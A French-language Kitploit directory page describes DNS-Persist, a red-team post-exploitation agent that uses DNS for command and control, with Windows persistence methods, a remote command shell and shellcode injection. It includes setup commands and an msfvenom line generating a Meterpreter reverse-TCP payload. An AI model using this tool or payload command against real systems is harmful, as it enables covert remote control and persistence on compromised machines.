Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DNS-Persist — DNS-Persist is a post-exploitation agent which uses DNS for command and control. | Kitploit
Outils/GitHubGitHub/0x09al/dns-persist
Payload GenerationPersistence MechanismsShellcodePost-ExploitationPenetration TestingCommand and ControlRed TeamingDNS Analysis
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist is a post-exploitation agent which uses DNS for command and control.

Voir le dépôt
20763il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DNS-Persist

DNS-Persist est un agent de post-exploitation qui utilise DNS pour le contrôle et la commande (C2). Le code côté serveur est en Python et l'agent est codé en C++. Il s'agit de la première version, plus de fonctionnalités et d'améliorations seront apportées à l'avenir.

Pour commencer

Auteur

0x09AL - https://twitter.com/0x09al

Avertissement

N'UTILISEZ PAS CE LOGICIEL À DES FINS ILLÉGALES.

L'AUTEUR N'ASSUME AUCUNE RESPONSABILITÉ EN CAS DE MAUVAISE UTILISATION DU CODE FOURNI ICI.

Ai-je réinventé la roue ?

Il existe beaucoup d'excellents travaux sur les C2 DNS mais j'ai créé ce logiciel pour me concentrer davantage sur la partie persistance. Je ne suis pas expert en C++ et c'est mon premier « vrai programme » en C++ (attendez-vous donc à un code un peu gênant).

Les suggestions concernant les fonctionnalités et les améliorations sont les bienvenues.

Architecture

Il y a deux parties principales :

  1. Serveur DNS
  2. Agent

texte alternatif

Fonctionnalités

Mécanismes de persistance

Cette version ne comporte que 3 mécanismes de persistance. D'autres seront ajoutés ultérieurement.

  1. Persistance LogonScript.
  2. Persistance RunKey.
  3. Persistance complément Excel.

Shell de commandes « interactif »

Cette version prend en charge un shell de commandes pseudo-interactif que vous pouvez utiliser pour exécuter des commandes système.

Injection de shellcode

Cette version prend en charge l'injection de shellcode 32 bits. Le shellcode est exécuté dans un nouveau thread du même processus, donc un shellcode qui plante ou invalide plantera également l'agent. Évitez les octets NULL dans le shellcode.

Exemple de génération de shellcode

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

LISTE DES TÂCHES

  1. Ajouter le chiffrement. Cette version n'a aucun chiffrement, utilisez-la donc à vos propres risques.
  2. Ajouter plus de mécanismes de persistance.
  3. Agent dans différents langages de programmation.

Installation et utilisation

Côté serveur

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

Par défaut, un serveur DNS sur le port 53 sera démarré. Vous pouvez le modifier dans le fichier server.py.

Agent

J'ai utilisé Visual Studio 2010 pour coder l'agent, donc l'importer et le compiler devrait être assez facile.

N'oubliez pas de modifier la variable DOMAIN_NAME dans Declarations.h pour qu'elle corresponde à votre nom de domaine.

Les serveurs de noms du domaine doivent pointer vers l'adresse IP de DNS-Persist.

root@kitploit:~
#define DOMAIN_NAME "example.com"

Captures d'écran

  1. Picture-1

alt text

  1. Picture-2

alt text

  1. Picture-3

alt text

  1. Picture-4

alt text

Télécharger l’outil